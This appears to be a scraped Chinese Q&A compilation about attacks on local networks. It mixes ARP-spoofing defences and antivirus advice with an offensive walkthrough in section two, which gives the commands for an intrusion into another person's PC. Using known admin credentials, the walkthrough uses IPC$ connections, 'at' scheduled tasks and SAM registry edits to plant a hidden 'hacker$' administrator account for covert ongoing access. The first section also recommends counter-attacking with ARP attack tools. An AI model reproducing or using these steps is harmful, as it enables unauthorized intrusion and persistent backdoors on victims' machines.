内容导读:导航目录:1、局域网IP攻击2、谁知道怎样在局域网攻击别人电脑,或者有什么好的软件介绍个!3、有什么软件能够让局域网IP冲突,除了本机的4、内网电脑,一直有***攻击,从杀毒软件里看到是两个IP一直在攻击,怎么解决?...……
导航目录:
- 1、局域网IP攻击
- 2、谁知道怎样在局域网攻击别人电脑,或者有什么好的软件介绍个!
- 3、有什么软件能够让局域网IP冲突,除了本机的
- 4、内网电脑,一直有 *** 攻击,从杀毒软件里看到是两个IP一直在攻击,怎么解决?
局域网IP攻击
首先在能正常上网时,进入命令提示附窗口,输入命令:arp -a,查看网关的IP对应的正确MAC地址, 并将其记录下来。如果之前没有记,可以在已经断网的情况的,先输入命令:arp -s,然后再输入命令:arp -a,这是记录下网关IP对应的正确MAC地址,并将其记录下来,这是记录的MAC地址可能不是很准确;接下来手工邦定网关IP地址和对应的正确的MAC地址。输入命令:arp -s 网关IP 网关MAC,把上面刚才记录的网关IP和网关MAC地址填写进去,回车执行。这时就OK了,试试看是不是可以上网了啊?
然后
利用Arpkiller的"Sniffer杀手"扫描整个局域网IP段,然后查找处在"混杂"模式下的计算机,就可以发现对方了。具体 *** 是:运行Arpkiller,然后点击"Sniffer监测工具",在出现的"Sniffer杀手"窗口中输入检测的起始和终止IP,单击"开始检测"就可以了。
检测完成后,如果相应的IP是绿帽子图标,说明这个IP处于正常模式,如果是红帽子则说明该网卡处于混杂模式。它就是我们的目标,就是这个家伙在捣乱。
扫描时自己也处在混杂模式,把自己不能算在其中
在对应IP找到那台机子,在对应机子找到是那个人,然后PK他。。。。 或者去下载一个高版本的 " *** 执法官" 其人之到反制其人之身 对他也进行ARP攻击 把他也弄掉线
谁知道怎样在局域网攻击别人电脑,或者有什么好的软件介绍个!
我可以告诉你一个办法不过需要对象的用户名和口令,还要知道他的IP
地址,只要你知道拿到账号和密码半个小时就可以搞定,以后你就有一个自己的隐藏管理员账户,随便进入他的电脑。
在这里将用at的命令,因为用at产生的计划任务是以系统身份运行的,所以也用不到psu.exe程序。为了能够使用at命令,肉鸡必须开有schedule的服务,如果没有开启,可用流光里带的工具netsvc.exe或sc.exe来远程启动,当然其 *** 也可以,只要能启动schedule服务就行。
对于命令行方式,你可以采用各种连接方式,如用SQLexec连接MSSQL的1433端口,也可以用telnet服务,只要以你能得到一个cmdshell,并且有运行at命令的权限就可以。
1.这里先假设他的用户名为administrator,密码为12345678,现在我们开始在命令行下远程为它建立隐藏的超级用户。(假设主机是局域网内的一台主机,ip地址为13.50.97.238,。)
2.先与他建立连接:
net
use
\\13.50.97.238\ipc$
"12345678"
/user:"Administrator”
3.用at命令在他的电脑建立一个用户(如果at服务没有启动,可用netsvc.exe或sc.exe来远程启动):
at
\\13.50.97.238
12:51
c:\windows\system32\net.exe
user
hacker$
1234
/add
建立这个加有$符的用户名,是因为加有$符后,命令行下用net
user将不显示这个用户,但在帐户管理器却能看到这个用户。
4.同样用at命令导出HKEY_LOCAL_MACHINE\sam\sam\Domains\account\users下键值:
at
\\13.50.97.238
12:55
c:\windows\regedit.exe
/e
hacker.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users
/e
是regedit.exe的参数,在这里HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users这个键的一定不要以“\“结尾。必要的情况下可以用引号将"c:\windows\regedit.exe
/e
hacker.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users"引起来。
5.将他的电脑上的hacker.reg下载到本机上用记事本打开进行编辑命令为:
Copy
\\13.50.97.238\admin$\system32\hacker.reg
c:\hacker.reg
6.再将编辑好的hacker.reg拷回他的电脑上
copy
c:\hacker.reg
\\13.50.97.238\admin$\system32\hacker1.reg
7.查看他的电脑时间:net
time
\\13.50.97.238然后用at命令将用户hacker$删除:
at
\\13.50.97.238
13:40
net
user
hacker$
/del
8.验证hacker$是否删除:net
use
\\13.50.97.238
/del
断开与他的电脑连接。
再用net
use
\\13.50.97.238\ipc$
"1234"
/user:"hacker$"
用帐户hacker$与他电脑连接,不能连接说明已删除。
9.再与他电脑建立连接:
net
use
\\13.50.97.238\ipc$
"12345678"
/user:"administrator"
再取得他的时间,用at命令将拷回他的hacker1.reg导入他的注册表:
at
\\13.50.97.238
13:41
c:\windows\regedit.exe
/s
hacker1.reg
regedit.exe的参数/s是指安静模式。
10.再验证hacker$是否已建立, *** 同上面验证hacker$是否被删除一样。
11.再验证用户hacker$是否有读、写、删除的权限,如果不放心,你还可验证是否能建立其它帐户。
12.通过步骤11可以断定用户hacker$具有超级用户权限,因为最初我用at命令建立它的时候是一个普通用户,而现在却具有远程读、写、删除的权限。
OK
以后你可以随意拿你的账号进入他电脑里游荡了~~~~~~~~~~~~~~~
有什么软件能够让局域网IP冲突,除了本机的
*** 执法官等所谓的局域网管理软件可以实现此功能,但不建议作出如此反击,有可能是他人中毒引起对你的攻击,并非恶意,你可以使用360arp防火墙之类的arp防火墙防御攻击,有条件的话可以在你们的交换机或路由器上划分子网,隔绝攻击。
内网电脑,一直有 *** 攻击,从杀毒软件里看到是两个IP一直在攻击,怎么解决?
关于您遇到的问题
内网电脑,一直有 *** 攻击,从杀毒软件里看到是两个IP一直在攻击,怎么解决?
让我感到很着急 让我来帮助您
从日志上看,您用的是火绒安全软件,攻击使用的是 *** bv1协议,火绒已经自动拦截该攻击不必过度担心
请找到169 22两台IP地址主机,使用杀毒软件彻底杀毒。
可以选择禁用该协议,这样会造成文件打印机共享出现问题
如有问题请追问 ,采纳可以帮助更多遇到此类问题的小伙伴,谢谢您的支持